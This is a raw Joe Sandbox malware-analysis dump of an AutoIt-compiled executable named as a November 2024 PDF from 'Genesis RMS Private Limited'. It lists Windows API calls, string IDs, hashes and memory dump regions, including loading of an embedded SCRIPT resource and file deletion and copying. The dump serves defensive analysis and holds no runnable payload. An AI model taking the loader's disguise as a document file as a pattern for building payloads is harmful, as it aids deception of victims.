                                                                                                                      • String ID: This is a third-party compiled AutoIt script.$runas$%~
                                                                                                                      • API String ID: 529118366-536648910
                                                                                                                      • Opcode ID: 88e49a1f7dc0b864396ba5c0b77d42194df6b2ec602e9329e9b5be74b51be76e
                                                                                                                      • Instruction ID: be11ced121b3d91d8a5131258f2307695bbd0e41bd63790213bebdb755f6577a
                                                                                                                      • Opcode Fuzzy Hash: 88e49a1f7dc0b864396ba5c0b77d42194df6b2ec602e9329e9b5be74b51be76e
                                                                                                                      • Instruction Fuzzy Hash: 9651D870D04248EACB11ABB4DC09DED7B7DFF04351B048169FC96A22E1EABC5A59CB21

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00754EEE,?,?,00000000,00000000), ref: 00754FF9
                                                                                                                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00754EEE,?,?,00000000,00000000), ref: 00755010
                                                                                                                      • LoadResource.KERNEL32(?,00000000,?,?,00754EEE,?,?,00000000,00000000,?,?,?,?,?,?,00754F8F), ref: 0078DD60
                                                                                                                      • SizeofResource.KERNEL32(?,00000000,?,?,00754EEE,?,?,00000000,00000000,?,?,?,?,?,?,00754F8F), ref: 0078DD75
                                                                                                                      • LockResource.KERNEL32(Nu,?,?,00754EEE,?,?,00000000,00000000,?,?,?,?,?,?,00754F8F,00000000), ref: 0078DD88
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                      • String ID: SCRIPT$Nu
                                                                                                                      • API String ID: 3051347437-3259838383
                                                                                                                      • Opcode ID: 6d83dca23b2cbe05e8072746c874169e55b33d6c15f6910cb88ae2d64fe27bf8
                                                                                                                      • Instruction ID: a4704f59bdaed6061088ebfbb682a821a5678d8df2f85bebf4b8bc81eef094aa
                                                                                                                      • Opcode Fuzzy Hash: 6d83dca23b2cbe05e8072746c874169e55b33d6c15f6910cb88ae2d64fe27bf8
                                                                                                                      • Instruction Fuzzy Hash: AA115E75240700AFD7219B65DC58F6B7BB9EBC9B11F14816DF80AC62A0DBA6EC048660

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • GetVersionExW.KERNEL32(?), ref: 00754B2B
                                                                                                                        • Part of subcall function 00757D2C: _memmove.LIBCMT ref: 00757D66
                                                                                                                      • GetCurrentProcess.KERNEL32(?,007DFAEC,00000000,00000000,?), ref: 00754BF8
                                                                                                                      • IsWow64Process.KERNEL32(00000000), ref: 00754BFF
                                                                                                                      • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00754C45
                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00754C50
                                                                                                                      • GetSystemInfo.KERNEL32(00000000), ref: 00754C81
                                                                                                                      • GetSystemInfo.KERNEL32(00000000), ref: 00754C8D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1986165174-0
                                                                                                                      • Opcode ID: 8e4a06c94404785f357898f638efb16836799ba174e04a28b46f89d669f40b1e
                                                                                                                      • Instruction ID: f027bf86429bec68dc5a4df62277296c7a6869378779e5eedee72b68b162d744
                                                                                                                      • Opcode Fuzzy Hash: 8e4a06c94404785f357898f638efb16836799ba174e04a28b46f89d669f40b1e
                                                                                                                      • Instruction Fuzzy Hash: 0B91F47158A7C0EEC731DB6884511EABFE5AF2A305B484D9ED4CB83A41D268E94CC729
                                                                                                                      APIs
                                                                                                                      • GetFileAttributesW.KERNELBASE(?,0078E7C1), ref: 007B46A6
                                                                                                                      • FindFirstFileW.KERNELBASE(?,?), ref: 007B46B7
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 007B46C7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: FileFind$AttributesCloseFirst
• String ID:
• API String ID: 48322524-0
• Opcode ID: 30e98b3d14e12b28e9cb9d5a9e41e5e09ad428f7b9770993f1acea55547e2f8e
• Instruction ID: 771de4351ae7403efb3d2b186be8361d623f3431d2dd2cc155038801ed95bb84
• Opcode Fuzzy Hash: 30e98b3d14e12b28e9cb9d5a9e41e5e09ad428f7b9770993f1acea55547e2f8e
• Instruction Fuzzy Hash: 01E0D8314114005B86106738EC4D4EE776C9E06339F104716F836C10E0E7B869608599
APIs
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00760BBB
• timeGetTime.WINMM ref: 00760E76
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00760FB3
• TranslateMessage.USER32(?), ref: 00760FC7
• DispatchMessageW.USER32(?), ref: 00760FD5
• Sleep.KERNEL32(0000000A), ref: 00760FDF
• LockWindowUpdate.USER32(00000000,?,?), ref: 0076105A
• DestroyWindow.USER32 ref: 00761066
• GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00761080
• Sleep.KERNEL32(0000000A,?,?), ref: 007952AD
• TranslateMessage.USER32(?), ref: 0079608A
• DispatchMessageW.USER32(?), ref: 00796098
• GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007960AC
Strings
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
• String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
• API String ID: 4003667617-3242690629
• Opcode ID: 2c957172e265d83ae76736de36a29cc4b8e78fb35d34c4c118a04387e4921e0a
• Instruction ID: 2d7f54c0d3614b7ea82c6189de1d7f19eeb9ee85f36e7085de8cc825c9c4182d
• Opcode Fuzzy Hash: 2c957172e265d83ae76736de36a29cc4b8e78fb35d34c4c118a04387e4921e0a
• Instruction Fuzzy Hash: 51B20670608751DFDB25DF24D888BAAB7E5FF84304F14891DF98A87291DB79E844CB82

Control-flow Graph

APIs
  • Part of subcall function 007B91E9: __time64.LIBCMT ref: 007B91F3
  • Part of subcall function 00755045: _fseek.LIBCMT ref: 0075505D
• __wsplitpath.LIBCMT ref: 007B94BE
  • Part of subcall function 0077432E: __wsplitpath_helper.LIBCMT ref: 0077436E
• _wcscpy.LIBCMT ref: 007B94D1
• _wcscat.LIBCMT ref: 007B94E4
• __wsplitpath.LIBCMT ref: 007B9509
• _wcscat.LIBCMT ref: 007B951F
• _wcscat.LIBCMT ref: 007B9532
  • Part of subcall function 007B922F: _memmove.LIBCMT ref: 007B9268
  • Part of subcall function 007B922F: _memmove.LIBCMT ref: 007B9277
• _wcscmp.LIBCMT ref: 007B9479
  • Part of subcall function 007B99BE: _wcscmp.LIBCMT ref: 007B9AAE
  • Part of subcall function 007B99BE: _wcscmp.LIBCMT ref: 007B9AC1
• DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 007B96DC
• _wcsncpy.LIBCMT ref: 007B974F
• DeleteFileW.KERNEL32(?,?), ref: 007B9785
• CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 007B979B
• DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 007B97AC
• DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 007B97BE
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
• String ID:
• API String ID: 1500180987-0
• Opcode ID: 1d628bc5ebb5344dfa056722776207f033123286d73fc7ff38a13e09cb1b7307
• Instruction ID: aa2e35405f704edf1e7b88826b231be6d2511a799ed9199bb0de428c1af414e4
• Opcode Fuzzy Hash: 1d628bc5ebb5344dfa056722776207f033123286d73fc7ff38a13e09cb1b7307
• Instruction Fuzzy Hash: DFC13CB1E00219AADF21DFA4CC85ADEB7BDEF45300F0040AAF619E7151DB789A448F65

Control-flow Graph

APIs
• GetSysColorBrush.USER32(0000000F), ref: 00753074
• RegisterClassExW.USER32(00000030), ref: 0075309E
• RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007530AF
• InitCommonControlsEx.COMCTL32(?), ref: 007530CC
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007530DC
• LoadIconW.USER32(000000A9), ref: 007530F2
• ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00753101
Strings
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
• String ID: +$0$AutoIt v3 GUI$TaskbarCreated
• API String ID: 2914291525-1005189915
• Opcode ID: 4f68569a94d2c6e9cdf9bb30b28d542010efe9f9d35d367098e30029dfa57f96
• Instruction ID: 9403641a300c7b2919ae543170a4ea8879335217ee0becef041cf6f4f941b8d0
• Opcode Fuzzy Hash: 4f68569a94d2c6e9cdf9bb30b28d542010efe9f9d35d367098e30029dfa57f96
• Instruction Fuzzy Hash: EB3129B1901349AFDB008FA4EC48AD9BBF4FF09320F14816AE591E62A0E3B94551CF95

Control-flow Graph

APIs
• GetSysColorBrush.USER32(0000000F), ref: 00753074
• RegisterClassExW.USER32(00000030), ref: 0075309E
• RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007530AF
• InitCommonControlsEx.COMCTL32(?), ref: 007530CC
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007530DC
• LoadIconW.USER32(000000A9), ref: 007530F2
• ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00753101
Strings
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
• String ID: +$0$AutoIt v3 GUI$TaskbarCreated
• API String ID: 2914291525-1005189915
• Opcode ID: a5e8fd3a0534e81f5f29b6a997f6656bdd9aace13f89737145fc1204794f890f
• Instruction ID: 5e260e16bad78f3683d5be7ba9731e6fe021295f60e3800123c13f7a12cde20f
• Opcode Fuzzy Hash: a5e8fd3a0534e81f5f29b6a997f6656bdd9aace13f89737145fc1204794f890f
• Instruction Fuzzy Hash: 6421C5B1912218AFDB00DFA4EC49BDDBBF8FB08710F00812AF952A62A0E7B545548F95

Control-flow Graph

APIs
  • Part of subcall function 00754864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,008162F8,?,007537C0,?), ref: 00754882
  • Part of subcall function 0077074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,007572C5), ref: 00770771
• RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00757308
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0078ECF1
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0078ED32
• RegCloseKey.ADVAPI32(?), ref: 0078ED70
• _wcscat.LIBCMT ref: 0078EDC9
Strings
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
• String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
• API String ID: 2673923337-2727554177
• Opcode ID: 40e6fe5273bd0450850498273303f6476fd7661f69441c7ece79be72461ebb3b
• Instruction ID: 005faae5879a0ccc0939fd1aa292cd127e60744b8fa11cf52c8af542e102e27c
• Opcode Fuzzy Hash: 40e6fe5273bd0450850498273303f6476fd7661f69441c7ece79be72461ebb3b
• Instruction Fuzzy Hash: F8714C71509301DEC714EF25EC8589BBBFCFF58350B40852EF846831A1EBB8994ACBA1

Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • DefWindowProcW.USER32(?,?,?,?), ref: 007536D2
                                                                                                                      • KillTimer.USER32(?,00000001), ref: 007536FC
                                                                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0075371F
                                                                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0075372A
                                                                                                                      • CreatePopupMenu.USER32 ref: 0075373E
                                                                                                                      • PostQuitMessage.USER32(00000000), ref: 0075375F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                      • String ID: TaskbarCreated$%~
                                                                                                                      • API String ID: 129472671-4286669069
                                                                                                                      • Opcode ID: 9497ad97297347907eb35678bf9d9cf50dfdd8f71bb87b5be5dc7c357a071c56
                                                                                                                      • Instruction ID: fd0cfb8dceadd1170e529cfd9a7ede81d4b803943a5ea9191186ba7dcac20184
                                                                                                                      • Opcode Fuzzy Hash: 9497ad97297347907eb35678bf9d9cf50dfdd8f71bb87b5be5dc7c357a071c56
                                                                                                                      • Instruction Fuzzy Hash: DB4129B1600109EBDB246B64DC4DBF93768FB04382F04452DFD42D22B1EAEC9E689365

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00753A62
                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00753A71
                                                                                                                      • LoadIconW.USER32(00000063), ref: 00753A88
                                                                                                                      • LoadIconW.USER32(000000A4), ref: 00753A9A
                                                                                                                      • LoadIconW.USER32(000000A2), ref: 00753AAC
                                                                                                                      • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00753AD2
                                                                                                                      • RegisterClassExW.USER32(?), ref: 00753B28
                                                                                                                        • Part of subcall function 00753041: GetSysColorBrush.USER32(0000000F), ref: 00753074
                                                                                                                        • Part of subcall function 00753041: RegisterClassExW.USER32(00000030), ref: 0075309E
                                                                                                                        • Part of subcall function 00753041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007530AF
                                                                                                                        • Part of subcall function 00753041: InitCommonControlsEx.COMCTL32(?), ref: 007530CC
                                                                                                                        • Part of subcall function 00753041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007530DC
                                                                                                                        • Part of subcall function 00753041: LoadIconW.USER32(000000A9), ref: 007530F2
                                                                                                                        • Part of subcall function 00753041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00753101
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                      • String ID: #$0$AutoIt v3
                                                                                                                      • API String ID: 423443420-4155596026
                                                                                                                      • Opcode ID: 6832bf939f15d1375eeed808a9c124af93e4932c9b4466404dfb7148411e66c6
                                                                                                                      • Instruction ID: b4df5ccc9396759435564d75dbc4a76c226749bcc5c70d11a0387f1fbf881879
                                                                                                                      • Opcode Fuzzy Hash: 6832bf939f15d1375eeed808a9c124af93e4932c9b4466404dfb7148411e66c6
                                                                                                                      • Instruction Fuzzy Hash: 59212E71D41304AFEB109FA4EC09BDD7BB9FF08721F00812AF544A62A0E3B95664CF54

                                                                                                                      Control-flow Graph

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                                                                                      • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                                                                                      • API String ID: 1825951767-3513169116
                                                                                                                      • Opcode ID: 52bdfa86cf4396406757f882574dfa994383b771ba63399d56cb558485d61f14
                                                                                                                      • Instruction ID: 1ed4f583484687dd6ec54dd0508a2fc96599742552a223528e666c62dc3c5a2d
                                                                                                                      • Opcode Fuzzy Hash: 52bdfa86cf4396406757f882574dfa994383b771ba63399d56cb558485d61f14
                                                                                                                      • Instruction Fuzzy Hash: 78A13E71D1022DDACB04EBA0CC9ADEEB778BF14341F444529E916B7191EFB96A0DCB60

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 018D26F1
                                                                                                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 018D2917
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1673001125.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_18d0000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFileFreeVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 204039940-0
                                                                                                                      • Opcode ID: c69e8af538ca099f1199ea1a41374fe769c00d7324591793f5319154b009097c
                                                                                                                      • Instruction ID: ac9c19e84ca85c8b817de517c804f279efc3080ba5688020599888cb49991831
                                                                                                                      • Opcode Fuzzy Hash: c69e8af538ca099f1199ea1a41374fe769c00d7324591793f5319154b009097c
                                                                                                                      • Instruction Fuzzy Hash: 58A10774E00309EBDB14CFA8C895BEEBBB6BF48305F208159E511BB281D7759A81CB95

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00753A15
                                                                                                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00753A36
                                                                                                                      • ShowWindow.USER32(00000000,?,?), ref: 00753A4A
                                                                                                                      • ShowWindow.USER32(00000000,?,?), ref: 00753A53
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$CreateShow
                                                                                                                      • String ID: AutoIt v3$edit
                                                                                                                      • API String ID: 1584632944-3779509399
                                                                                                                      • Opcode ID: 83180fe927729d2129d5fb5a4eb14bdd8c8d570c6ac7e6d33ffe8299f7d65ab2
                                                                                                                      • Instruction ID: 7d533b84a6f6290bf85d85d2401eb5124ac854660e556e1b783989b08593f151
                                                                                                                      • Opcode Fuzzy Hash: 83180fe927729d2129d5fb5a4eb14bdd8c8d570c6ac7e6d33ffe8299f7d65ab2
                                                                                                                      • Instruction Fuzzy Hash: D5F03A706012907EEA3017236C08FA72F7DEBC6F60B01802AF900E2270D2B91821CAB0

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 018D22A0: Sleep.KERNELBASE(000001F4), ref: 018D22B1
                                                                                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 018D250D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1673001125.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_18d0000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFileSleep
                                                                                                                      • String ID: Y33L5H9DQYCDQAA8M7ZN0J
                                                                                                                      • API String ID: 2694422964-3120167010
                                                                                                                      • Opcode ID: 6402d8c42e8b075ace5a46948f20192f0ac04f277e733e09f56231174d21485e
                                                                                                                      • Instruction ID: 0bc1624dc02383303cc4271ee5e3083859d5f568b102953e3d0802e91929f449
                                                                                                                      • Opcode Fuzzy Hash: 6402d8c42e8b075ace5a46948f20192f0ac04f277e733e09f56231174d21485e
                                                                                                                      • Instruction Fuzzy Hash: 8F617130D04348DBEF11DBE8D854BEEBB75AF18304F044199E249BB2C0D6BA5B85CB66

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0078D5EC
